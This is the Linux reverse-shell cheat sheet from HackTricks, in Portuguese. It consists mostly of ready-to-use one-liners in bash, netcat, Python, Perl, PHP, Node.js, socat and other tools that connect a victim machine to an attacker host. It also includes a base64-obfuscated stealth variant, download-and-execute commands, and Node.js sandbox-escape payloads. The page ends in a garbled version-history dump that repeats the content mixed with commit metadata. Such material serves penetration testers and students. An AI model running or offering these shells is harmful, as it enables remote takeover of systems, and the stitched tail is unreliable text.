hacktricks/generic-methodologies-and-resources/shells/linux.md

# Shells - Linux

<details>

<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras formas de apoiar o HackTricks:

* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>

Encontre vulnerabilidades que importam mais para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

***

**Se você tem dúvidas sobre alguma destas shells, pode consultá-las em** [**https://explainshell.com/**](https://explainshell.com)

## Full TTY

**Uma vez que você obtenha um reverse shell,** [**leia esta página para obter um full TTY**](full-ttys.md)**.**

## Bash | sh
```bash
curl https://reverse-shell.sh/1.1.1.1:3000 | bash
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done

#Short and bypass (credits to Dikline)
(sh)0>/dev/tcp/10.10.10.10/9091
#after getting the previous shell to get the output to execute
exec >&0
```
Não se esqueça de verificar com outros shells: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh e bash.

### Shell seguro de símbolos
```bash
#If you need a more stable connection do:
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'

#Stealthier method
#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
```
#### Explicação do Shell

1. **`bash -i`**: Esta parte do comando inicia um Shell Bash interativo (`-i`).
2. **`>&`**: Esta parte do comando é uma notação abreviada para **redirecionar tanto a saída padrão** (`stdout`) quanto o **erro padrão** (`stderr`) para o **mesmo destino**.
3. **`/dev/tcp/<IP-DO-ATAQUE>/<PORTA>`**: Este é um arquivo especial que **representa uma conexão TCP para o endereço IP e porta especificados**.
* Ao **redirecionar os fluxos de saída e erro para este arquivo**, o comando efetivamente envia a saída da sessão do shell interativo para a máquina do atacante.
4. **`0>&1`**: Esta parte do comando **redireciona a entrada padrão (`stdin`) para o mesmo destino que a saída padrão (`stdout`)**.

### Criar em arquivo e executar
```bash
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
```
## Forward Shell

Você pode encontrar casos em que possui um **RCE em um aplicativo web em uma máquina Linux** mas, devido a regras do Iptables ou outros tipos de filtragem, **não consegue obter um reverse shell**. Esse "shell" permite que você mantenha um shell PTY através desse RCE usando pipes dentro do sistema da vítima.\
Você pode encontrar o código em [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell)

Você só precisa modificar:

* A URL do host vulnerável
* O prefixo e sufixo do seu payload (se houver)
* A maneira como o payload é enviado (headers? data? informações extras?)

Então, você pode simplesmente **enviar comandos** ou até mesmo **usar o comando `upgrade`** para obter um PTY completo (note que os pipes são lidos e escritos com um atraso aproximado de 1,3s).

## Netcat
```bash
nc -e /bin/sh <ATTACKER-IP> <PORT>
nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
```
## gsocket

Verifique em [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/)
```bash
bash -c "$(curl -fsSL gsocket.io/x)"
```
## Telnet
```bash
telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
telnet <ATTACKER-IP> <PORT> | /bin/bash | telnet <ATTACKER-IP> <PORT>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
```
## Whois

**Atacante**
```bash
while true; do nc -l <port>; done
```
Para enviar o comando, escreva-o, pressione enter e pressione CTRL+D (para interromper STDIN)

**Vítima**
```bash
export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done
```
## Python
```bash
#Linux
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
#IPv6
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
```
## Perl
```bash
perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```
## Ruby
```bash
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```
## PHP
```php
// Using 'exec' is the most common method, but assumes that the file descriptor will be 3.
// Using this method may lead to instances where the connection reaches out to the listener and then closes.
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

// Using 'proc_open' makes no assumptions about what the file descriptor will be.
// See https://security.stackexchange.com/a/198944 for more information
<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>

<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
```
## Java
```bash
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```
## Ncat
```bash
victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
attacker> ncat -v 10.0.0.22 4444 --ssl
```
Descubra as vulnerabilidades que mais importam para que você possa corrigi-las mais rapidamente. O Intruder monitora sua superfície de ataque, realiza varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

***
```bash
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
```
## Lua
```bash
#Linux
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
#Windows & Linux
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```
## NodeJS
```javascript
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "10.17.26.64", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();


or

require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")

or

-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')

or

// If you get to the constructor of a function you can define and execute another function inside a string
"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()


or

// Abuse this syntax to get a reverse shell
var fs = this.process.binding('fs');
var fs = process.binding('fs');

or

https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
```
## OpenSSL

O Atacante (Kali)
```bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
```
A Vítima
```bash
#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
```
## **Socat**

[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)

### Shell de Vínculo
```bash
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
```
### Shell Reverso
```bash
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
```
## Awk
```bash
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
```
## Finger

**Atacante**
```bash
while true; do nc -l 79; done
```
Para enviar o comando, escreva-o, pressione enter e pressione CTRL+D (para interromper STDIN)

**Vítima**
```bash
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null')`; sleep 1; done

export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
```
## Gawk
```bash
#!/usr/bin/gawk -f

BEGIN {
Port    =       8080
Prompt  =       "bkd> "

Service = "/inet/tcp/" Port "/0/0"
while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != "exit")
close(Service)
}
}
```
## Xterm

Uma das formas mais simples de reverse shell é uma sessão xterm. O seguinte comando deve ser executado no servidor. Ele tentará se conectar de volta a você (10.0.0.1) na porta TCP 6001.
```bash
xterm -display 10.0.0.1:1
```
Para capturar o xterm recebido, inicie um X-Server (:1 – que escuta na porta TCP 6001). Uma maneira de fazer isso é com Xnest (a ser executado no seu sistema):
```bash
Xnest :1
```
Você precisará autorizar o alvo a se conectar com você (comando também executado no seu host):
```bash
xhost +targetip
```
## Groovy

por [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NOTA: Java reverse shell também funciona para Groovy
```bash
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```
## Bibliografia

{% embed url="https://highon.coffee/blog/reverse-shell-cheat-sheet/" %}

{% embed url="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell" %}

{% embed url="https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/" %}

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" %}

<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>

Encontre vulnerabilidades que importam mais para que você possa corrigi-las mais rápido. Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}


<details>

<summary><strong>Aprenda hacking em AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras formas de apoiar o HackTricks:

* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
-												GitBook: [#3199] No subject

											
										
										
											2022-05-11 14:59:34 +00:00
+								# Shells - Linux
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								Outras formas de apoiar o HackTricks:
 								* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
 								* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
 								* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
 								* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
 								* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
+								<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								Encontre vulnerabilidades que importam mais para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
 								{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
 								***
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								**Se você tem dúvidas sobre alguma destas shells, pode consultá-las em** [**https://explainshell.com/**](https://explainshell.com)
-												GitBook: [master] 380 pages modified
											
										
										
											2020-10-17 17:35:35 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								## Full TTY
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-19 11:54:25 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								**Uma vez que você obtenha um reverse shell,** [**leia esta página para obter um full TTY**](full-ttys.md)**.**
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-19 11:54:25 +00:00
-												GitBook: [#3199] No subject

											
										
										
											2022-05-11 14:59:34 +00:00
+								## Bash | sh
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
-												GitBook: [#3199] No subject

											
										
										
											2022-05-11 14:59:34 +00:00
+								curl https://reverse-shell.sh/1.1.1.1:3000 | bash
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
-												GITBOOK-3850: change request with no subject merged in GitBook

											
										
										
											2023-03-30 19:24:10 +00:00
+								bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
 								exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done
-												GITBOOK-3850: change request with no subject merged in GitBook

											
										
										
											2023-03-30 19:24:10 +00:00
 								#Short and bypass (credits to Dikline)
-												GitBook: [master] 2 pages modified
											
										
										
											2021-03-30 00:10:09 +00:00
+								(sh)0>/dev/tcp/10.10.10.10/9091
-												Update linux.md
											
										
										
											2022-09-13 16:41:09 +00:00
+								#after getting the previous shell to get the output to execute
-												GitBook: [master] 2 pages modified
											
										
										
											2021-03-30 00:10:09 +00:00
+								exec >&0
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								Não se esqueça de verificar com outros shells: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh e bash.
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								### Shell seguro de símbolos
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								#If you need a more stable connection do:
-												GitBook: [master] one page modified
											
										
										
											2020-11-05 20:05:40 +00:00
+								bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								#Stealthier method
-												GitBook: [master] one page modified
											
										
										
											2020-11-05 20:05:40 +00:00
+								#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
 								```
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								#### Explicação do Shell
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+. **`bash -i`**: Esta parte do comando inicia um Shell Bash interativo (`-i`).
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-09-03 01:19:04 +00:00
+. **`>&`**: Esta parte do comando é uma notação abreviada para **redirecionar tanto a saída padrão** (`stdout`) quanto o **erro padrão** (`stderr`) para o **mesmo destino**.
 . **`/dev/tcp/<IP-DO-ATAQUE>/<PORTA>`**: Este é um arquivo especial que **representa uma conexão TCP para o endereço IP e porta especificados**.
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								* Ao **redirecionar os fluxos de saída e erro para este arquivo**, o comando efetivamente envia a saída da sessão do shell interativo para a máquina do atacante.
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+. **`0>&1`**: Esta parte do comando **redireciona a entrada padrão (`stdin`) para o mesmo destino que a saída padrão (`stdout`)**.
-												GitBook: [master] one page modified
											
										
										
											2020-11-15 22:04:11 +00:00
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								### Criar em arquivo e executar
-												GitBook: [master] one page modified
											
										
										
											2020-11-15 22:04:11 +00:00
+								```bash
 								echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
-												GitBook: [master] one page modified
											
										
										
											2020-11-15 22:28:16 +00:00
+								wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
-												GitBook: [master] one page modified
											
										
										
											2020-11-15 22:04:11 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								## Forward Shell
-												GitBook: [master] one page modified
											
										
										
											2020-11-15 22:04:11 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								Você pode encontrar casos em que possui um **RCE em um aplicativo web em uma máquina Linux** mas, devido a regras do Iptables ou outros tipos de filtragem, **não consegue obter um reverse shell**. Esse "shell" permite que você mantenha um shell PTY através desse RCE usando pipes dentro do sistema da vítima.\
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Você pode encontrar o código em [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell)
-												GitBook: [#3002] No subject

											
										
										
											2022-02-09 20:23:12 +00:00
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Você só precisa modificar:
-												GitBook: [#3002] No subject

											
										
										
											2022-02-09 20:23:12 +00:00
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								* A URL do host vulnerável
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								* O prefixo e sufixo do seu payload (se houver)
 								* A maneira como o payload é enviado (headers? data? informações extras?)
-												GitBook: [#3002] No subject

											
										
										
											2022-02-09 20:23:12 +00:00
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								Então, você pode simplesmente **enviar comandos** ou até mesmo **usar o comando `upgrade`** para obter um PTY completo (note que os pipes são lidos e escritos com um atraso aproximado de 1,3s).
-												GitBook: [#3002] No subject

											
										
										
											2022-02-09 20:23:12 +00:00
-												GitBook: [#3199] No subject

											
										
										
											2022-05-11 14:59:34 +00:00
+								## Netcat
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								nc -e /bin/sh <ATTACKER-IP> <PORT>
 								nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
 								rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
 								nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
 								rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
 								```
-												GITBOOK-3925: change request with no subject merged in GitBook

											
										
										
											2023-05-15 10:19:32 +00:00
+								## gsocket
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								Verifique em [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/)
-												GITBOOK-3925: change request with no subject merged in GitBook

											
										
										
											2023-05-15 10:19:32 +00:00
+								```bash
 								bash -c "$(curl -fsSL gsocket.io/x)"
 								```
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								## Telnet
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
 								rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
 								telnet <ATTACKER-IP> <PORT> | /bin/bash | telnet <ATTACKER-IP> <PORT>
 								rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
 								```
-												GitBook: [#3199] No subject

											
										
										
											2022-05-11 14:59:34 +00:00
+								## Whois
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								**Atacante**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								while true; do nc -l <port>; done
 								```
-												Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene

											
										
										
											2023-12-30 22:28:51 +00:00
+								Para enviar o comando, escreva-o, pressione enter e pressione CTRL+D (para interromper STDIN)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Portuguese

											
										
										
											2023-06-06 18:56:34 +00:00
+								**Vítima**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done
 								```
-												GitBook: [#3199] No subject

											
										
										
											2022-05-11 14:59:34 +00:00
+								## Python
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								#Linux
 								export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
